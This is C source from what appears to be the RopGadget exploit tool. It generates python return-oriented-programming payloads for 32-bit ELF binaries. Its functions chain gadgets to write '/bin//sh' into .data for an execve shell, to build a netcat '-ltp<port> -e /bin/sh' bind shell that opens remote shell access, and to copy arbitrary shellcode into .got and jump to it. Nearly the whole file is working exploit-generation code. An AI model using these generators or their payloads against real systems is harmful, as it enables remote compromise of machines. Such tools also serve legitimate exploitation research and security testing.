/*
** Try "combo 1": the execve("/bin/sh") gadget set listed in
** tab_combo_ropsh2. Every instruction of the table is looked up; the
** verdict is printed first, then one line per instruction (address and
** gadget text when found, dots when missing), then the .data address the
** payload writes into. When no instruction is missing, the found gadgets
** are collected into a t_makecode list and handed to makecode(), which
** emits the python payload.
*/
void combo_ropmaker2(void)
{
  int missing = 0;
  int idx;
  Elf32_Addr where;
  t_makecode *found = NULL;

  /* first pass: is any instruction of the combo absent from the binary? */
  for (idx = 0; tab_combo_ropsh2[idx].instruction; idx++)
    {
      if (!search_instruction(tab_combo_ropsh2[idx].instruction))
        {
          missing = 1;
          break;
        }
    }

  if (missing)
    fprintf(stderr, "[%s-%s] Combo 1 was not found, missing instruction(s).\n", RED, ENDC);
  else
    fprintf(stdout, "[%s+%s] Combo 1 was found - Possible with the following gadgets. (execve)\n", GREEN, ENDC);

  /* second pass: report each instruction; gadgets are collected only when
     the whole combo is usable, since makecode() is only run in that case */
  for (idx = 0; tab_combo_ropsh2[idx].instruction; idx++)
    {
      where = search_instruction(tab_combo_ropsh2[idx].instruction);
      if (!where)
        {
          fprintf(stdout, "\t- %s..........%s => %s%s%s\n", RED, ENDC, RED, tab_combo_ropsh2[idx].instruction, ENDC);
          continue;
        }
      fprintf(stdout, "\t- %s0x%.8x%s => %s%s%s\n", GREEN, where, ENDC, GREEN, get_gadget_since_addr(where), ENDC);
      if (!missing)
        found = add_element(found, get_gadget_since_addr_att(where), where);
    }
  fprintf(stdout, "\t- %s0x%.8x%s => %s.data Addr%s\n", GREEN, Addr_sData, ENDC, GREEN, ENDC);

  /* build the python payload */
  if (!missing)
    makecode(found);
}
/*
** Part 1 of the local payload: write "/bin//sh\0" into .data so that
** execve() can later be called with .data as its path argument.
**
** Every 4-byte store is built from the same gadgets taken from list_ins:
**   pop <dst reg>     -- destination address (.data + offset)
**   pop <val reg>     -- the 4 characters to store
**   mov %val,(%dst)   -- the store itself
** The terminating NUL uses "xor %val,..." instead of the second pop to
** zero the value register before the same mov. The value/destination
** registers are those of the "mov %e?x,(%e?x)" gadget that was found.
** The python payload goes to stdout.
*/
static void makepartie1_local(t_makecode *list_ins)
{
  static const char *const words[] = { "/bin", "//sh" };
  Elf32_Addr addr_mov;
  Elf32_Addr addr_xor;
  Elf32_Addr addr_pop_dst;
  Elf32_Addr addr_pop_val;
  char *mov;
  char *xor_g;
  char *pop_dst;
  char *pop_val;
  char *val_reg;
  char *dst_reg;
  char pat_pop_dst[32] = "pop %";
  char pat_pop_val[32] = "pop %";
  char pat_xor[32] = "xor %";
  unsigned int off;
  size_t n;

  addr_mov = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)");
  mov = get_gadget_since_addr_att(addr_mov);

  /* AT&T "mov %val,(%dst)": first operand is the value, second the address */
  val_reg = get_first_reg(mov);
  dst_reg = get_second_reg(mov);

  strncat(pat_pop_dst, dst_reg, 3);
  strncat(pat_pop_val, val_reg, 3);
  strncat(pat_xor, val_reg, 3);

  addr_pop_dst = ret_addr_makecodefunc(list_ins, pat_pop_dst);
  pop_dst = get_gadget_since_addr_att(addr_pop_dst);
  addr_pop_val = ret_addr_makecodefunc(list_ins, pat_pop_val);
  pop_val = get_gadget_since_addr_att(addr_pop_val);

  addr_xor = ret_addr_makecodefunc(list_ins, pat_xor);
  /* intel-syntax text here, unlike the other gadgets (kept as the original emits it) */
  xor_g = get_gadget_since_addr(addr_xor);

  fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
  fprintf(stdout, "\t\t%s# execve /bin/sh generated by RopGadget v3.4.2%s\n", BLUE, ENDC);

  /* "/bin" at .data, "//sh" at .data + 4 */
  for (n = 0; n < sizeof(words) / sizeof(words[0]); n++)
    {
      off = (unsigned int)(4 * n);

      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_dst, pop_dst, ENDC);
      display_padding(how_many_pop_before(pop_dst, pat_pop_dst));
      if (off == 0)
        fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC);
      else
        fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + %u%s\n", BLUE, Addr_sData + off, off, ENDC);
      display_padding(how_many_pop_after(pop_dst, pat_pop_dst));

      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_val, pop_val, ENDC);
      display_padding(how_many_pop_before(pop_val, pat_pop_val));
      fprintf(stdout, "\t\t%sp += \"%s\"%s\n", BLUE, words[n], ENDC);
      display_padding(how_many_pop_after(pop_val, pat_pop_val));

      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov, mov, ENDC);
      display_padding(how_many_pop(mov));
    }

  /* terminating NUL at .data + 8: zero the value register, then store it */
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_dst, pop_dst, ENDC);
  display_padding(how_many_pop_before(pop_dst, pat_pop_dst));
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 8%s\n", BLUE, Addr_sData + 8, ENDC);
  display_padding(how_many_pop_after(pop_dst, pat_pop_dst));
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor, xor_g, ENDC);
  display_padding(how_many_pop(xor_g));
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov, mov, ENDC);
  display_padding(how_many_pop(mov));

  /* the register names are the only strings this function owns */
  free(val_reg);
  free(dst_reg);
}
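/* Gadgets shared by every 4-byte store of the bind-shell payload. */
struct remote_store_gadgets
{
  Elf32_Addr addr_mov;      /* mov %val,(%dst): the store itself */
  Elf32_Addr addr_xor;      /* xor %val,...: zeroes the value register */
  Elf32_Addr addr_pop_dst;  /* pop %dst: loads the destination address */
  Elf32_Addr addr_pop_val;  /* pop %val: loads the 4 bytes to store */
  char *mov;                /* printable gadget text (AT&T) */
  char *xor_g;              /* printable gadget text (intel, as the original emits it) */
  char *pop_dst;
  char *pop_val;
  char *pat_pop_dst;        /* "pop %e?x" pattern, used to count the other pops of the gadget */
  char *pat_pop_val;
};

/* Emit ".data + off" as a payload dword; offset 0 is printed as plain ".data". */
static void remote_emit_data_addr(unsigned int off)
{
  if (off == 0)
    fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC);
  else
    fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + %u%s\n", BLUE, Addr_sData + off, off, ENDC);
}

/* Load .data + off into the destination register (pop gadget plus its padding). */
static void remote_emit_dst(const struct remote_store_gadgets *g, unsigned int off)
{
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, g->addr_pop_dst, g->pop_dst, ENDC);
  display_padding(how_many_pop_before(g->pop_dst, g->pat_pop_dst));
  remote_emit_data_addr(off);
  display_padding(how_many_pop_after(g->pop_dst, g->pat_pop_dst));
}

/* Perform the store: mov %val,(%dst) plus padding for the pops it drags along. */
static void remote_emit_mov(const struct remote_store_gadgets *g)
{
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, g->addr_mov, g->mov, ENDC);
  display_padding(how_many_pop(g->mov));
}

/*
** Store 4 raw bytes (emitted as a python string literal) at .data + off.
** word must be exactly 4 characters: the store is a full register write,
** and a shorter or longer literal shifts every dword that follows it in
** the generated payload.
*/
static void remote_store_word(const struct remote_store_gadgets *g, unsigned int off, const char *word)
{
  remote_emit_dst(g, off);
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, g->addr_pop_val, g->pop_val, ENDC);
  display_padding(how_many_pop_before(g->pop_val, g->pat_pop_val));
  fprintf(stdout, "\t\t%sp += \"%s\"%s\n", BLUE, word, ENDC);
  display_padding(how_many_pop_after(g->pop_val, g->pat_pop_val));
  remote_emit_mov(g);
}

/* Store the address .data + target at .data + off (argv[] table entries). */
static void remote_store_ptr(const struct remote_store_gadgets *g, unsigned int off, unsigned int target)
{
  remote_emit_dst(g, off);
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, g->addr_pop_val, g->pop_val, ENDC);
  display_padding(how_many_pop_before(g->pop_val, g->pat_pop_val));
  remote_emit_data_addr(target);
  display_padding(how_many_pop_after(g->pop_val, g->pat_pop_val));
  remote_emit_mov(g);
}

/* Store a zero dword at .data + off: xor clears the value register, then mov. */
static void remote_store_zero(const struct remote_store_gadgets *g, unsigned int off)
{
  remote_emit_dst(g, off);
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, g->addr_xor, g->xor_g, ENDC);
  display_padding(how_many_pop(g->xor_g));
  remote_emit_mov(g);
}

/*
** Part 1 of the remote payload: lay out the argv of
**   //usr/bin/netcat -ltp<port> -e///bin//sh
** in .data, 4 bytes per ROP store, followed by the argv[] pointer table:
**
**   .data + 0   "//usr/bin/netcat"   (NUL at +16)
**   .data + 17  "-ltp<port>"         (NUL at +25; port occupies +21..+24)
**   .data + 26  "-e///bin//sh"       (NUL at +38)
**   .data + 40  .data + 0
**   .data + 44  .data + 17
**   .data + 48  .data + 26
**   .data + 52  NULL
**
** Every store writes a full 32-bit register, so each NUL write also zeroes
** the 3 bytes after it; the following word overwrites them. Gadgets come
** from list_ins; the value/destination registers are those of the
** "mov %e?x,(%e?x)" gadget that was found. Python code goes to stdout,
** diagnostics to stderr.
*/
static void makepartie1_remote(t_makecode *list_ins)
{
  struct remote_store_gadgets g;
  const char *port = bind_mode.port;
  char *val_reg;
  char *dst_reg;
  char pat_pop_dst[32] = "pop %";
  char pat_pop_val[32] = "pop %";
  char pat_xor[32] = "xor %";

  g.addr_mov = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)");
  g.mov = get_gadget_since_addr_att(g.addr_mov);

  /* AT&T "mov %val,(%dst)": first operand is the value, second the address */
  val_reg = get_first_reg(g.mov);
  dst_reg = get_second_reg(g.mov);

  strncat(pat_pop_dst, dst_reg, 3);
  strncat(pat_pop_val, val_reg, 3);
  strncat(pat_xor, val_reg, 3);
  g.pat_pop_dst = pat_pop_dst;
  g.pat_pop_val = pat_pop_val;

  g.addr_pop_dst = ret_addr_makecodefunc(list_ins, pat_pop_dst);
  g.pop_dst = get_gadget_since_addr_att(g.addr_pop_dst);
  g.addr_pop_val = ret_addr_makecodefunc(list_ins, pat_pop_val);
  g.pop_val = get_gadget_since_addr_att(g.addr_pop_val);
  g.addr_xor = ret_addr_makecodefunc(list_ins, pat_xor);
  g.xor_g = get_gadget_since_addr(g.addr_xor);

  /* The port is emitted as a raw python literal into a 4-byte slot
     (.data + 21..24, NUL at +25) filled by one register write. Anything
     but 4 characters desynchronises every dword after it, so say so
     instead of silently generating a broken chain. */
  if (port == NULL || strlen(port) != 4)
    fprintf(stderr, "[%s-%s] bind port must be exactly 4 characters to fit the .data + 21 slot; the generated payload will be misaligned.\n", RED, ENDC);

  fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
  fprintf(stdout, "\t\t%s# execve /bin/sh bindport %s generated by RopGadget v3.4.2%s\n", BLUE, bind_mode.port, ENDC);

  /* argv[0]: "//usr/bin/netcat" at .data + 0 */
  remote_store_word(&g, 0, "//us");
  remote_store_word(&g, 4, "r/bi");
  remote_store_word(&g, 8, "n/ne");
  remote_store_word(&g, 12, "tcat");
  remote_store_zero(&g, 16);

  /* argv[1]: "-ltp<port>" at .data + 17 */
  remote_store_word(&g, 17, "-ltp");
  remote_store_word(&g, 21, bind_mode.port);
  remote_store_zero(&g, 25);

  /* argv[2]: "-e///bin//sh" at .data + 26 */
  remote_store_word(&g, 26, "-e//");
  remote_store_word(&g, 30, "/bin");
  remote_store_word(&g, 34, "//sh");
  remote_store_zero(&g, 38);

  /* argv[] table at .data + 40, NULL-terminated */
  remote_store_ptr(&g, 40, 0);
  remote_store_ptr(&g, 44, 17);
  remote_store_ptr(&g, 48, 26);
  /* four byte-stepped zero stores, exactly as before (each already writes 4 bytes) */
  remote_store_zero(&g, 52);
  remote_store_zero(&g, 53);
  remote_store_zero(&g, 54);
  remote_store_zero(&g, 55);

  /* the register names are the only strings this function owns */
  free(val_reg);
  free(dst_reg);
}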
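/*
** Part 1 of the "import shellcode" payload: copy the shellcode, one byte
** at a time, from the places where each byte already exists in .text into
** .got, then return into .got.
**
** Per byte i (gadgets are matched with the %e?x wildcard; the register
** names below are only an example):
**   gad1  pop %edx          <- address of the byte in .text
**   gad2  mov (%edx),%ecx   <- read 4 bytes from there
**   gad3  mov %ecx,%eax     <- only when useless < 0
**   gad1  pop %edx          <- .got + i
**   gad4  mov %eax,(%edx)   <- store
** Each store writes a full register at .got + i, so byte i+1 overwrites
** the 3 stray bytes left by byte i; the last store spills 3 bytes past
** the end of the shellcode.
**
** list_ins : gadget list built by the caller
** useless  : < 0 selects the extra register move (name kept for callers)
** pop_reg  : the "pop %e?x" pattern of the address register
**
** importsc_mode is global state: poctet is walked to the tail of the list
** and consumed back to the head through ->back, and is left wherever the
** walk stops.
*/
static void makepartie1_importsc(t_makecode *list_ins, int useless, char *pop_reg)
{
  int i = 0;
  Elf32_Addr addr_gad1;
  Elf32_Addr addr_gad2;
  Elf32_Addr addr_gad3;
  Elf32_Addr addr_gad4;
  char *gad1;
  char *gad2;
  char *gad3;
  char *gad4;

  addr_gad1 = ret_addr_makecodefunc(list_ins, pop_reg);
  /* NOTE(review): gad1 is fetched in intel syntax here, while the local and
     remote generators hand the AT&T text to how_many_pop_before/after. If
     pop_reg is an AT&T pattern ("pop %edx"), the substring match against
     gad1 may miss and the padding count be wrong -- confirm against
     how_many_pop_before(). */
  gad1      = get_gadget_since_addr(addr_gad1);
  addr_gad2 = ret_addr_makecodefunc(list_ins, "mov (%e?x),%e?x");
  gad2      = get_gadget_since_addr(addr_gad2);
  addr_gad3 = ret_addr_makecodefunc(list_ins, "mov %e?x,%e?x");
  gad3      = get_gadget_since_addr(addr_gad3);
  addr_gad4 = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)");
  gad4      = get_gadget_since_addr(addr_gad4);

  fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);

  /* every byte of the shellcode must exist somewhere in .text */
  if (checkOpcodeWasFound() == FALSE)
    {
      fprintf(stdout, "\t%s/!\\ Impossible to generate your shellcode because some opcode was not found.%s\n", RED, ENDC);
      return ;
    }

  /* an empty byte list used to be dereferenced while seeking the tail */
  if (importsc_mode.poctet == NULL)
    {
      fprintf(stdout, "\t%s/!\\ Impossible to generate your shellcode because it is empty.%s\n", RED, ENDC);
      return ;
    }

  fprintf(stdout, "\t\t%s# Shellcode imported! Generated by RopGadget v3.4.2%s\n", BLUE, ENDC);

  /* the list is consumed from its tail back to its head */
  while (importsc_mode.poctet->next != NULL)
    importsc_mode.poctet = importsc_mode.poctet->next;

  while (i != importsc_mode.size && importsc_mode.poctet != NULL)
    {
      /* gad1: address register <- where this byte lives in .text */
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad1, gad1, ENDC);
      display_padding(how_many_pop_before(gad1, pop_reg));
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ 0x%.2x%s\n", BLUE, importsc_mode.poctet->addr, importsc_mode.poctet->octet, ENDC);
      display_padding(how_many_pop_after(gad1, pop_reg));
      /* gad2: load 4 bytes from that address */
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad2, gad2, ENDC);
      display_padding(how_many_pop(gad2));
      if (useless < 0)
        {
          /* gad3: move the value into the register gad4 stores from */
          fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad3, gad3, ENDC);
          display_padding(how_many_pop(gad3));
        }
      /* gad1: address register <- .got + i */
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad1, gad1, ENDC);
      display_padding(how_many_pop_before(gad1, pop_reg));
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .got + %d%s\n", BLUE, Addr_sGot + i, i, ENDC);
      display_padding(how_many_pop_after(gad1, pop_reg));
      /* gad4: store the register at .got + i */
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad4, gad4, ENDC);
      display_padding(how_many_pop(gad4));
      importsc_mode.poctet = importsc_mode.poctet->back;
      i++;
    }
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # jump to our shellcode in .got%s\n", BLUE,  Addr_sGot , ENDC);
}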